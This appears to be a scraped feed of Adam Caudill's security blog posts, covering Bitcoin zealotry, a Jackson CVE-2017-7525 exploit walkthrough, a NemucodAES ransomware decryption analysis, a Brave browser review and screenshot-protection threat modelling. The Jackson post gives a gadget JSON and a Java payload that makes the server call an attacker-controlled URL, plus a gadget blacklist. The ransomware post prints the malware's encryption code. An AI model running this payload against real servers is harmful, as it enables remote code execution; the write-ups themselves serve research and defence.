Every year, their ranks grow, and their perception of cryptocurrencies becomes more grandiose, even as novel uses of the technology brings it to its knees. While I’m a firm believer that a well designed cryptocurrency could ease the flow of money across borders, and provide a stable option in areas of mass inflation, the reality is that we aren’t there yet. In fact, it’s the substantial instability in value that allows speculators to make money. Those that preach that the US Dollar and Euro are on their deathbed have utterly abandoned an objective view of reality.

A little background…

I read the Bitcoin white-paper the day it was released – an interesting use of Merkle trees to create a public ledger and a fairly reasonable consensus protocol – it got the attention of many in the cryptography sphere for its novel properties. In the years since that paper was released, Bitcoin has become rather valuable, attracted many that see it as an investment, and a loyal (and vocal) following of people who think it’ll change everything. This discussion is about the latter.

Yesterday, someone on Twitter posted the hash of a recent Bitcoin block, the thousands of Tweets and other conversations that followed have convinced me that Bitcoin has crossed the line into true cult territory.

It all started with this Tweet by Mark Wilcox:

The value posted is the hash of Bitcoin block #528249. The leading zeros are a result of the mining process; to mine a block you combine the contents of the block with a nonce (and other data), hash it, and it has to have at least a certain number of leading zeros to be considered valid. If it doesn’t have the correct number, you change the nonce and try again. Repeat this until the number of leading zeros is the right number, and you now have a valid block. The part that people got excited about is what follows, 21e800.

Some are claiming this is an intentional reference, that whoever mined this block actually went well beyond the current difficulty to not just bruteforce the leading zeros, but also the next 24 bits – which would require some serious computing power. If someone had the ability to bruteforce this, it could indicate something rather serious, such as a substantial breakthrough in computing or cryptography.

You must be asking yourself, what’s so important about 21e800 – a question you would surely regret. Some are claiming it’s a reference to E8 Theory (a widely criticized paper that presents a standard field theory), or to the 21,000,000 total Bitcoins that will eventually exist (despite the fact that 21 x 10^8 would be 2,100,000,000). There are others, they are just too crazy to write about. Another important fact is that a block is mined on average on once a year that has 21e8 following the leading zeros – those were never seen as anything important.

This leads to where things get fun: the theories that are circulating about how this happened.

  • A quantum computer, that is somehow able to hash at unbelievable speed. This is despite the fact that there’s no indication in theories around quantum computers that they’ll be able to do this; hashing is one thing that’s considered safe from quantum computers.
  • Time travel. Yes, people are actually saying that someone came back from the future to mine this block. I think this is crazy enough that I don’t need to get into why this is wrong.
  • Satoshi Nakamoto is back. Despite the fact that there has been no activity with his private keys, some theorize that he has returned, and is somehow able to do things that nobody can. These theories don’t explain how he could do it.

If all this sounds like numerology to you, you aren’t alone.

All this discussion around special meaning in block hashes also reignited the discussion around something that is, at least somewhat, interesting. The Bitcoin genesis block, the first bitcoin block, does have an unusual property: the early Bitcoin blocks required that the first 32 bits of the hash be zero; however the genesis block had 43 leading zero bits. As the code that produced the genesis block was never released, it’s not known how it was produced, nor is it known what type of hardware was used to produce it. Satoshi had an academic background, so may have had access to more substantial computing power than was common at the time via a university. At this point, the oddities of the genesis block are a historical curiosity, nothing more.

A brief digression on hashing

This hullabaloo started with the hash of a Bitcoin block; so it’s important to understand just what a hash is, and understand one very important property they have. A hash is a one-way cryptographic function that creates a pseudo-random output based on the data that it’s given.

What this means, for the purposes of this discussion, is that for each input you get a random output. Random numbers have a way of sometimes looking interesting, simply as a result of being random and the human brain’s affinity to find order in everything. When you start looking for order in random data, you find interesting things – that are yet meaningless, as it’s simply random. When people ascribe significant meaning to random data, it tells you far more about the mindset of those involved rather than the data itself.

Cult of the Coin

First, let us define a couple of terms:

  • Cult: a system of religious veneration and devotion directed toward a particular figure or object.
  • Religion: a pursuit or interest to which someone ascribes supreme importance.

The Cult of the Coin has many saints, perhaps none greater than Satoshi Nakamoto, the pseudonym used by the person(s) that created Bitcoin. Vigorously defended, ascribed with ability and understanding far above that of a normal researcher, seen as a visionary beyond compare that is leading the world to a new economic order. When combined with Satoshi’s secretive nature and unknown true identify, adherents to the Cult view Satoshi as a truly venerated figure.

That is, of course, with the exception of adherents that follow a different saint, who is unquestionably correct, and any criticism is seen as not only an attack on their saint, but on themselves as well. Those that follow EOS for example, may see Satoshi has a hack that developed a failed project, yet will react fiercely to the slightest criticism of EOS, a reaction so strong that it’s reserved only for an attack on one’s deity. Those that follow IOTA react with equal fierceness; and there are many others.

These adherents have abandoned objectivity and reasonable discourse, and allowed their zealotry to cloud their vision. Any discussion of these projects and the people behind them that doesn’t include glowing praise inevitably ends with a level of vitriolic speech that is beyond reason for a discussion of technology.

This is dangerous, for many reasons:

  • Developers & researchers are blinded to flaws. Due to the vast quantities of praise by adherents, those involved develop a grandiose view of their own abilities, and begin to view criticism as unjustified attacks – as they couldn’t possibly have been wrong.
  • Real problems are attacked. Instead of technical issues being seen as problems to be solved and opportunities to improve, they are seen as attacks from people who must be motivated to destroy the project.
  • One coin to rule them all. Adherents are often aligned to one, and only one, saint. Acknowledging the qualities of another project means acceptance of flaws or deficiencies in their own, which they will not do.
  • Preventing real progress. Evolution is brutal, it requires death, it requires projects to fail and that the reasons for those failures to be acknowledged. If lessons from failure are ignored, if things that should die aren’t allowed to, progress stalls.

Discussions around many of the cryptocurrencies and related blockchain projects are becoming more and more toxic, becoming impossible for well-intentioned people to have real technical discussions without being attacked. With discussions of real flaws, flaws that would doom a design in any other environment, being instantly treated as heretical without any analysis to determine the factual claims becoming routine, the cost for the well-intentioned to get involved has become extremely high. There are at least some that are aware of significant security flaws that have opted to remain silent due to the highly toxic environment.

What was once driven by curiosity, a desire to learn and improve, to determine the viability of ideas, is now driven by blind greed, religious zealotry, self-righteousness, and self-aggrandizement.

I have precious little hope for the future of projects that inspire this type of zealotry, and its continuous spread will likely harm real research in this area for many years to come. These are technical projects, some projects succeed, some fail – this is how technology evolves. Those designing these systems are human, just as flawed as the rest of us, and so too are the projects flawed. Some are well suited to certain use cases and not others, some aren’t suited to any use case, none yet are suited to all. The discussions about these projects should be focused on the technical aspects, and done so to evolve this field of research; adding a religious to these projects harms all.

[Note: There are many examples of this behavior that could be cited, however in the interest of protecting those that have been targeted for criticizing projects, I have opted to minimize such examples. I have seen too many people who I respect, too many that I consider friends, being viciously attacked – I have no desire to draw attention to those attacks, and risk restarting them.]

The post Bitcoin is a Cult appeared first on Adam Caudill.

Adam Caudill <![CDATA[Exploiting the Jackson RCE: CVE-2017-7525]]> 2017-10-04T17:59:57Z 2017-10-04T17:59:57Z Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less… Continue reading Exploiting the Jackson RCE: CVE-2017-7525

The post Exploiting the Jackson RCE: CVE-2017-7525 appeared first on Adam Caudill.

Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it.

What To Look For

There are a couple of ways to use Jackson, the simplest, and likely most common, is to perform a binding to a single object, pulling the values from the JSON and setting the properties on the associated Java object. This is simple, straightforward, and likely not exploitable. Here’s a sample of what that type of document looks like:

  "name" : "Bob", "age" : 13,
  "other" : {
     "type" : "student"

What we are interested in, is a bit different – in some cases1 you are create arbitrary objects, and you will see their class name in the JSON document. If you see this, it should raise an immediate red flag. Here’s a sample of what these look like:


To determine if this really is Jackson that you are seeing, one technique is (if detailed error messages are available) to provide invalid input and look for references to either of these:

  • com.fasterxml.jackson.databind

Building An Exploit

The ability to create arbitrary objects though, does come with some limitations: the most important of which is that Jackson requires a default constructor (no arguments), so some things that seem like obvious choices (i.e. java.lang.ProcessBuilder) aren’t an option. There are some suggestions on techniques in the paper from Moritz Bechler, though the technique pushed in the paper is interesting (the focus is on loading remote objects from another server), it didn’t meet my needs. There are other, simple options available.

Helpfully, the project gave us a starting point to build an effective exploit in one of their unit tests:

{'id': 124,
 'obj':[ '',
    'transletBytecodes' : [ 'AAIAZQ==' ],
    'transletName' : 'a.b',
    'outputProperties' : { }

This code leverages a well-known ‘gadget’ to create an object that will accept a compile Java object (via transletBytecodes) and execute it as soon as outputProperties is accessed. This creates a very simple, straightforward technique to exploit this vulnerability.

We can supply a payload to this to prove that we have execution, and we are done.

Building The Payload

In this case, the goal is to prove that we have execution, and the route I went is to have the server issue a GET request to Burp Collaborator. This can be done easily with the following sample code:


public class Exploit extends {
  public Exploit() throws Exception {
    StringBuilder result = new StringBuilder();
    URL url = new URL("http://[your-url]");
    HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
    String line;
    while ((line = rd.readLine()) != null) {

  public void transform( document, iterator, handler) {

  public void transform( document,[] handler)  {

This code can be compiled with the javac compiler, and then the resulting .class file should be Base64 encoded, and provided to the transletBytecodes field in the JSON document. As soon as the document is processed, it will create the object, load the code, and execute it. You may still see errors from code failing after the code executes, such as from type-mismatches or the like.

Limiting Attack Surface

This is just one technique to exploit this flaw, there are many others available. To mitigate the issue, at least in part, Jackson has been modified with a blacklist of types known to be useful gadgets for this type of attack:

  • org.apache.commons.collections.functors.InvokerTransformer
  • org.apache.commons.collections.functors.InstantiateTransformer
  • org.apache.commons.collections4.functors.InvokerTransformer
  • org.apache.commons.collections4.functors.InstantiateTransformer
  • org.codehaus.groovy.runtime.ConvertedClosure
  • org.codehaus.groovy.runtime.MethodClosure
  • org.springframework.beans.factory.ObjectFactory
  • org.apache.xalan.xsltc.trax.TemplatesImpl
  • com.sun.rowset.JdbcRowSetImpl
  • java.util.logging.FileHandler
  • java.rmi.server.UnicastRemoteObject
  • org.springframework.beans.factory.config.PropertyPathFactoryBean
  • com.mchange.v2.c3p0.JndiRefForwardingDataSource
  • com.mchange.v2.c3p0.WrapperConnectionPoolDataSource

There are likely others that can be used in similar ways to gain code execution that haven’t become well-known yet, so this doesn’t eliminate the problem, it just makes it less likely.

Required Reading & References

To fully understand this vulnerability, there are a few things that you should read:

  1. To exploit this issue, the user of the library must have enabled Default Typing (mapper.enableDefaultTyping), if this hasn’t been done, then the exploit here doesn’t work, as you aren’t able to create arbitrary objects. 

The post Exploiting the Jackson RCE: CVE-2017-7525 appeared first on Adam Caudill.

Adam Caudill <![CDATA[Breaking the NemucodAES Ransomware]]> 2017-07-13T01:47:08Z 2017-07-13T01:23:13Z The Nemucod ransomware has been around, in various incarnations, for some time. Recently a new variant started spreading via email claiming to be from UPS. This new version changed how files are encrypted, clearly in an attempt to fix its prior issue of being able to decrypt files without paying the ransom, and as this… Continue reading Breaking the NemucodAES Ransomware

The post Breaking the NemucodAES Ransomware appeared first on Adam Caudill.

The Nemucod ransomware has been around, in various incarnations, for some time. Recently a new variant started spreading via email claiming to be from UPS. This new version changed how files are encrypted, clearly in an attempt to fix its prior issue of being able to decrypt files without paying the ransom, and as this is a new version, no decryptor was available1. My friends at Savage Security contacted me to help save the data of one of their clients; I immediately began studying the cryptography related portions of the software, while the Savage Security team was busy looking at other portions.

The Code

The code that really matters is in a PHP file2, named after the Bitcoin address that the victim is to pay the ransom to, and stored under the user’s %TEMP% directory. Here’s the bit that matters to us:

if ($stat_files > 0) {
    $db = fopen($fn . ".db", "w");
    foreach ($_SERVER["files"] as $file) {
        $fp = fopen($file, "r+");
        if ($fp === false) continue;
        $trash = "";
        for ($i = 0;$i < 2048;$i++) $trash.= chr(mt_rand(0, 255));
        $key = "";
        for ($i = 0;$i < 128;$i++) $key.= chr(mt_rand(0, 255));
        $aes = new Crypt_AES(CRYPT_AES_MODE_ECB);
        $b = fread($fp, 2048);
        fseek($fp, 0);
        fwrite($fp, substr($trash, 0, strlen($b)));
        $b = $aes->encrypt($b);
        $rsa = new Crypt_RSA();
        $key = $rsa->encrypt($key);
        fputs($db, $file . "    " . base64_encode($key) . " " . base64_encode($b) . "

There are some important things that we see immediately:

  • They generate a unique encryption key for each file.
  • They are using AES-128 in ECB mode.
  • They are using RSA to encrypt the AES-128 key and store it in a .db file (also named after the Bitcoin address).
  • They encrypt the first 2,048 bytes of the file, and then replace it with random data.
  • The .db file contains the path, encrypted AES-128 key, and the encrypted data removed from the file.

The Critical Mistake(s)

If you’ve been to any of my talks on cryptography, you should see an immediate issue with this code. If not, let me point this line out:

for ($i = 0;$i < 128;$i++) $key.= chr(mt_rand(0, 255));

This line creates a 128 byte key to be used to encrypt the file (it seems the developers don’t know bits from bytes), using PHP’s mt_rand function. This function generates random numbers using the Mersenne Twister algorithm, which happens to use a small (32-bit) seed – this is where the fun begins.

Because of this small seed, if we can observe the initial output of mt_rand, we can brute-force the seed and then predict its future output. Thankfully, the developers of Nemucod made this easy for us. If you recall, the first 2,048 bytes of each file are replaced with random data from mt_rand, then the encryption key is generated immediately after. This means that they have given us everything we need.

Using the first few bytes (4 or 5), we can brute-force the seed that mt_rand used3, and by running mt_rand the appropriate number of times, we can create the exact output that the PHP script did when it encrypted the files, revealing the file encryption keys and allowing us to decrypt all of the files.

Cracking the Seed

To get the seed, we need to brute-force all 2^32 possible values, thankfully there’s a handy tool to do this – and do it within a matter of seconds. A few years ago the always impressive Solar Designer released just what we need. This is a simple command-line tool that takes output (in this case the first few bytes of the first file encrypted) and provides the seed that was used.

./php_mt_seed 98 98 0 255  251 251 0 255 47 47 0 255  131 131 0 255
Found 0, trying 1241513984 - 1275068415, speed 39053601 seeds per second 
seed = 1241912029
Found 1, trying 4261412864 - 4294967295, speed 45989778 seeds per second 
Found 1

Using php_mt_seed, it takes only about a minute to test all of the possible seeds, and identify the correct one. Once we have that, decryption is simple, and we have all of the data back without paying a single cent to the extortionists.

Why Randomness Matters

When it comes to key generation (and many other aspects of cryptography), the use of a secure random number generator is critical. If you look at the documentation for mt_rand, you’ll see this very clear warning:

This function does not generate cryptographically secure values, and should not be used for cryptographic purposes. If you need a cryptographically secure value, consider using random_int(), random_bytes(), or openssl_random_pseudo_bytes() instead.

Had the developers heeded this warning, and used a more appropriate method for generating the file encryption keys, this method would not have worked. Had the developers not been so kind as to provide us with output from mt_rand in the files, this would not have worked. It is the developers of Nemucod that made recovering the data trivial, due to the lack of understanding of proper secure techniques4. While I don’t want to aid ransomware authors, this is a well known aspect of cryptography – if you write crypto code without a full understanding of what you are doing, and what you are using, this is what happens.

  1. In the hours before this post was published, Emsisoft released a decryption tool for those hit by this version of Nemucod. 
  2. This ransomware targets Windows users, though the core is written in PHP. The downloader, written in JavaScript, downloads the Windows version of PHP (version 5.6.3) and uses that to execute the PHP file. Yes, this is as crazy as it sounds. 
  3. If mt_rand is not seeded explicitly via mt_srand, PHP will select a random seed, and seed it automatically. In this case, the developers did not explicitly select a seed. 
  4. There may be additional methods here that could be used, but those are beyond the scope of this article. 

The post Breaking the NemucodAES Ransomware appeared first on Adam Caudill.

Adam Caudill <![CDATA[30 Days of Brave]]> 2017-05-02T22:38:25Z 2017-05-02T22:38:25Z Brave is a web browser available for multiple platforms that aims to provide additional security and privacy features – plus a novel monetization scheme for publishers. I gave it 30 days to see if it was worth using. I switched on all platforms I use to give it a fair shot, I normally use Chrome… Continue reading 30 Days of Brave

The post 30 Days of Brave appeared first on Adam Caudill.


Brave is a web browser available for multiple platforms that aims to provide additional security and privacy features – plus a novel monetization scheme for publishers. I gave it 30 days to see if it was worth using. I switched on all platforms I use to give it a fair shot, I normally use Chrome which made the switch less painful, though the results were very much mixed. There are some things I honestly liked about it, some things I really disliked, and at least one thing that just made me mad.

The Good

There are some truly good things about Brave, here are a few that are important to me.

Based on Blink (Chromium)

Brave is built on the Blink engine, the same engine that powers Chromium & Chrome – this gives Brave some of the better security properties of Chrome, and Brave actually uses the Chrome user-agent to pretend to be Chrome. This means that Brave has similar performance and rendering quality to the other Blink browsers, which gives it an edge over Firefox and keeps it on par with Chrome.

The use of Blink is a key to making the switch reasonable, there are no issues with sites breaking, as is so common when switching from one browser to another.

HTTPS Everywhere

Brave integrates HTTPS Everywhere to force connections to use TLS when possible, this is great, though the same can be achieved by using the HTTPS Everywhere plugin. During my time using Brave, it reports having performed over 15,000 TLS upgrades – just on my personal laptop.

Ad Blocking & Payments

Brave takes an interesting view of ads, it includes ad blocking, but also includes Brave Payments (disabled by default), which allows you to give something to the sites you visit most often. I put $5 into it, and let it run for a month – it tracks how much time you spend on each site, and splits up the money between them.

Of all the sites that Brave lists in my top sites, only two are setup to actually receive the payments – this site (which I setup during the testing process), and There are a number of sites that are included that really make little sense – for example, sites like,,,,, and all made the list to be paid. These aren’t content sites, but they all got a share of the money. You can selectively disable certain sites from being included, but that requires watching the list, and making sure that it’s maintained. You don’t have the opportunity to confirm who gets paid before the payment takes place, so make sure you check the list often.

When a payment is made, the money (Bitcoin actually), is transferred to accounts that Brave Software controls, and when (if) a site receives $100 in payments, one of two things happens:

  • If the site has already been setup for payments, the money is transferred to the site’s Bitcoin wallet.
  • If the site isn’t setup, they will attempt to contact them to set up the site so they can receive their money, if they don’t after a period of time, the money is distributed to other sites that are properly setup.

It’s an interesting setup, and somewhat cool to be honest – though does leave a decent amount of money in the control of Brave Software. Will this site ever get $100 in revenue from Brave users? I’m not holding my breath. That means that the money will stay in the control of Brave Software essentially forever.

The ad blocking itself works well, roughly the same you would get from uBlock Origin.


It’s hard to quantify just how much time is actually saved by using Brave; it’s not just general performance, but the integrated ad blocking that saves bandwidth and processing time. It claims to have saved me 18 minutes on my laptop and 5 minutes on my iPhone.

It does feel a bit faster, but the placebo effect may explain it.

The Bad

There are some things about Brave that just didn’t live up to my expectations, some of these are from a lack of polish – things that will likely be fixed as time goes on, others were more fundamental.

Private Browsing

Like pretty much every major browser today, Brave offers a private browsing feature, but it’s implemented in a way that I find troubling. Typically when you using Private Browsing, a new window is created, and everything in that window is held to a private scope. In Brave, a tab is private – so you mix the scopes, and can easily cross that boundary. When you right-click a link in a private tab, you can open the link in a new private tab, or in a new normal tab. This makes it extremely easy to cross the line, and expose activity that was meant to be isolated.

For me, I often use this feature to separate session scopes, logging into the same site in a normal window, and a different account (or no account) in a private window. This design makes it trivial to take an action under the wrong account. I think they were trying to make things easier, but what they did was make it easy to make mistakes.

Memory Leaks

Brave is leaky, like Titanic kind of leaky. I once left a Twitter tab open over a weekend, when I came back on Monday Brave had consumed every available byte of RAM. So much so, that even killing the process turned out to be impossible and I had to perform a hard reboot. Chrome is known for its high RAM usage, though Brave has pushed it too far.

PDF Handling

Built-in PDF handling is essentially a must these days, and Brave tries here – but ultimately fails. The integrated PDF viewer works well in most cases, unless the PDF is behind a login. In these cases, it fails and requires that the feature be disabled to be able to download them. As changing this setting requires restarting the application, so I eventually just left it off.

Rough Edges

Brave is a perfect setup for a death by a thousand cuts, from oddness with tab management, painful auto-complete in the search / address bar, the inability to search for anything with a period as Brave treats it as a URL, and many others. Much of this will improve as Brave matures, though for now the rough edges are a constant annoyance that make me want to switch back to Chrome. Some I’ve learned to work around, others are still painful every time I run into them.

The Mad

Brave recently published a highly misleading article that painted a very negative view of the standard QUIC protocol, trying to accuse Google of using QUIC as a way to circumvent ad blocking. The article was built on, at best, a significant misunderstand on the part of Brave. The article was later updated, though the update was entirely insufficient to set the record straight, leaving users with a misunderstanding of the technology, and how it applies to Chrome and other browsers.

Whether purely from a lack of understanding, or something else, the issue was poorly handled – they attacked a competitor (one which makes their product possible) without understanding the details they were talking about, mislead users of Chrome and Brave, and failed to accurately update their article to undo their misstatements. There are some people at Brave Software that I greatly respect, so this was shocking for me, and I lost a great deal of respect for the organization as a result.


Brave is an interesting experiment in how a browser can address privacy concerns, and provide an avenue for monetization; I hope that others in the market look at it and learn from what they do right. The application for iOS feels a lot more polished than the desktop version, and while I’m going to switch back to Chrome as my primary browser, I may keep the iOS version handy.

The post 30 Days of Brave appeared first on Adam Caudill.

Adam Caudill <![CDATA[Confide, Screenshots, and Imaginary Threats]]> 2017-04-22T05:20:40Z 2017-04-22T05:20:40Z Recently Vice published a story about a lawsuit against the makers of the ‘secure’ messaging application Confide. This isn’t just a lawsuit, it’s a class-action lawsuit and brought by Edelson PC – an amazingly successful (and sometimes hated1) law firm – this isn’t a simple case. The complaint includes a very important point: Specifically, Confide… Continue reading Confide, Screenshots, and Imaginary Threats

The post Confide, Screenshots, and Imaginary Threats appeared first on Adam Caudill.


Recently Vice published a story about a lawsuit against the makers of the ‘secure’ messaging application Confide. This isn’t just a lawsuit, it’s a class-action lawsuit and brought by Edelson PC – an amazingly successful (and sometimes hated1) law firm – this isn’t a simple case. The complaint includes a very important point:

Specifically, Confide fails to deliver on two of the three requirements that it espouses as necessary for confidential communications: ephemerality and screenshot protection. […] Confide represents, in no uncertain terms, that its App blocks screenshots. But that isn’t true. Any Confide user accessing the platform through the Windows App can take screenshots of any and all received messages.

This article isn’t about the lawsuit though, it’s about threat modeling and screenshots.

Of Screenshots and Cameras

Preventing screenshots, or at least attempting to, has been around for some time, and was made popular thanks to Snapchat – their client would detect that a screenshot was captured, and using an API call, notify the server that this had happened (unsurprisingly, this API was rarely documented, as none of the third-party clients wanted it), so the sender could be alerted. When this feature was added, technical attacks were discussed by many that were following Snapchat’s attempts at living up to their word – from modifying the binary to not make the API call, to using a proxy server that would block the call to the server.

Yet for all of the technical solutions, there was an easier answer: grab another device with a camera and take a picture.

Many people that work in corporate or other environments that have strict security requirements often carry two mobile devices – if you know (or suspect) that a messaging application will block or report a screenshot, just take a picture of it with your other device. This completely bypasses the technical restriction on screenshots2. It’s simple, it works, and it’s undetectable. Then there are virtual machines – you could run an application in a virtual machine, and capture the screenshot from the host, instead of the guest operating system. Once again, this is effective and undetectable. Then there are numerous others.

Trust Violated

If you can’t trust the person you are talking to, don’t talk to them. If send a message to somebody that contains sensitive statements, and you can’t trust them to keep it private – the only way to ensure that it’s not shared is to simply not send it. There is no technical solution to ensure that a message displayed on a screen is actually ephemeral. This is why high security environments where sensitive (i.e. classified) information may be on display don’t allow cameras or devices with cameras at all.

If a user wants to capture information about a conversation, and there are numerous ways that they are able to do just that, they will get it. If they take a little care, nobody will know that they’ve done it. If they have technical ability (of know somebody that does), then it’ll be effortless and undetectable. Confide may, and should, make changes to address the technical issues with their screenshot protection feature to behave in a more effective way; that said, they will never be able to actually prevent all screenshots.

Screenshot protection is a vain effort; if it’s displayed on screen, it can be captured. People may think that they need it because it’s how they would capture a conversation, but it doesn’t actually provide any effective security. Features like this, and claims that applications implement them, are little more than snake-oil aimed at making consumers believe that an application provides a level of security that isn’t actually possible.

  1. Jay Edelson & team may be hated by some in Silicon Valley – but they have done a lot to protect consumers, and suing over security claims is an important avenue to ensure that companies live up to their promises. My research on Snapchat was cited by the FTC in their action against Snapchat, which I am still very proud of. Needless to say, I favor whatever action is necessary to ensure that companies live up to their promises, and consumers aren’t being sold snake-oil. 
  2. There are theoretical means to complicate this, by using a controlled “flicker” to make it more difficult to capture a useable photo. This comes with various downsides, not the least of which is the high likelihood of giving users a constant headache. 

The post Confide, Screenshots, and Imaginary Threats appeared first on Adam Caudill.